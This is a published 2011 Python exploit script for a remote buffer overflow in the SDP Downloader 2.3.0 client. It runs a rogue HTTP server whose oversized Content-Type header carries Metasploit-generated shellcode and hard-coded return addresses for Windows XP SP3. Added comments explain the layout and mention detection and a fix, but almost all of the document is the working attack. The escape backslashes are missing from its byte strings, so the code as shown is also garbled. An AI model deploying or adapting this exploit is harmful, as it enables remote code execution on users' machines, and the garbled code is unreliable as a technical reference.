
# Title : SDP Downloader 2.3.0 (http_response) Remote Buffer Overflow Exploit
# Published : 2011-01-30
# Author : sup3r


#!/usr/bin/python
#Bug : SDP Downloader (http_response) Remote Buffer Overflow Exploit
# by: sup3r
#Tested on : Xp sp3
#http://sdp.ppona.com/

from socket import *

# win32_exec -  EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Payload, written as adjacent string literals (implicit concatenation).
# The metasploit banner above is the author's description of how it was
# generated; nothing in this script inspects it — it is only spliced into
# `buffer` below, and its length feeds the filler arithmetic there.
shellcode=(
"x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x71"
"xf3x2ax67x83xebxfcxe2xf4x8dx1bx6ex67x71xf3xa1x22"
"x4dx78x56x62x09xf2xc5xecx3exebxa1x38x51xf2xc1x2e"
"xfaxc7xa1x66x9fxc2xeaxfexddx77xeax13x76x32xe0x6a"
"x70x31xc1x93x4axa7x0ex63x04x16xa1x38x55xf2xc1x01"
"xfaxffx61xecx2exefx2bx8cxfaxefxa1x66x9ax7ax76x43"
"x75x30x1bxa7x15x78x6ax57xf4x33x52x6bxfaxb3x26xec"
"x01xefx87xecx19xfbxc1x6exfax73x9ax67x71xf3xa1x0f"
"x4dxacx1bx91x11xa5xa3x9fxf2x33x51x37x19x8dxf2x85"
"x02x9bxb2x99xfbxfdx7dx98x96x90x4bx0bx12xf3x2ax67")

# The oversized header value. Layout, in the script's own repeat counts:
#   4 of 'x41', the payload, 'x41' up to 65584, a 4-element value the author
#   labels as the payload address, 36 more of 'x41', a 4-element value
#   labelled as a stack address, then 9000 of 'x43'.
# The (65584 - len(shellcode)) term absorbs the payload length, so the
# payload-plus-filler section has a fixed size whatever the payload is.
buffer =  'x41'*4
buffer += shellcode
buffer += 'x41'*(65584-len(shellcode))
buffer += 'xF0xF1xABx00'	
#00ABF1F0(shellcode address)
# Author's annotation: the four elements above are the address the overwritten
# return is meant to land on; it is hard-coded for the tested build (XP SP3).
buffer += 'x41'*36
buffer += 'xBCxEBx12x00'	
#0012EBBC Stack section (writable)
buffer += 'x43'*9000

# A canned HTTP/1.1 response. Every field but one is ordinary IIS-looking
# filler; the anomalous one is Content-Type, whose value is `buffer` — far
# beyond any legitimate media-type string. Content-Length: 324 is not backed
# by a body (none is sent); the header, not the body, is the trigger the
# title describes ("http_response" buffer overflow in the client).
# Detection: a response header line of tens of KB is well outside normal
# sizes; a proxy/IDS header-length cap flags it, and the client-side fix is
# bounding the Content-Type copy before use.
header=(
"HTTP/1.1 200 OKrn"
"Content-Type: video/"+buffer+"rn"
"Last-Modified: 20 Mar 2010 09:50:10 GMTrn"
"Accept-Ranges: bytesrn"
"ETag: "075a1fc3d4dc41:0"rn"
"Server: Microsoft-IIS/7.5rn"
"X-Powered-By: ASP.NETrn"
"Date: Sat, 20 Mar 2010 14:31:46 GMTrn"
"Connection: closern"
"Content-Length: 324rnrn")

# This script is the *server* side: it waits for the vulnerable client to
# connect and then replies with `header`. It binds all interfaces on TCP/80
# (which on most systems needs elevated privileges) and accepts one client.
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on [HTTP] 80"   # Python 2 print statement
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
# Read up to 1 KB of whatever the client sent and discard it; the request
# is never parsed, so any connecting client gets the same response.
c.recv(1024)
# Sent twice. send() may transmit fewer bytes than given; the return value
# is ignored, so there is no guarantee the whole header goes out.
c.send(header)
c.send(header)
# Block until the operator presses Enter so the sockets stay open meanwhile.
raw_input("[+] Done, press enter to quit")
c.close()
s.close()